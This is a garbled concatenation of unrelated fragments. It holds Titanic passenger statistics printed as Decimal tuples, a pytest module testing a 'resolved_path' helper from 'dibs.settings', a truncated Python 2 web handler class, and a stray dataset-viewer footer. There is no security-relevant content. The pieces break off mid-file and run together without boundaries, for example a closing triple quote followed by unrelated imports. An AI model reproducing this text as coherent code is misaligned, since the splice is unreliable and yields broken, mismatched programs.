[(0, Decimal('0.55779816513761467890')), (1, Decimal('0.47368421052631578947'))]
How many parents/children aboard on average, by passenger class? By survival?
By class
[(1, Decimal('0.35648148148148148148')), (2, Decimal('0.38043478260869565217')), (3, Decimal('0.39630390143737166324'))]
By survival
[(0, Decimal('0.33211009174311926606')), (1, Decimal('0.46491228070175438596'))]
Do any passengers have the same name?
Total names
[(887,)]
Total distinct names
[]
All names unique
""" |
import os
from os.path import dirname, join, isabs, isdir, exists, abspath, realpath
import pytest
import sys
import datetime as dt
try:
thisdir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(thisdir, '..'))
except:
sys.path.append('..')
from dibs.settings import config, resolved_path
def test_relative_to_caller():
me = __file__
d = resolved_path('tests/test_resolved_path.py')
assert d == abspath(me)
def test_relative_to_settings():
here = dirname(__file__)
other = abspath(join(here, os.pardir, 'admin/run-server'))
d = resolved_path('admin/run-server')
assert d == other
|
import time
from datetime import datetime
import config
from web.models.models import Instance
from web.basehandler import BaseHandler
class InstancesHandler(BaseHandler):
def get(self):
print "running tasks" |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.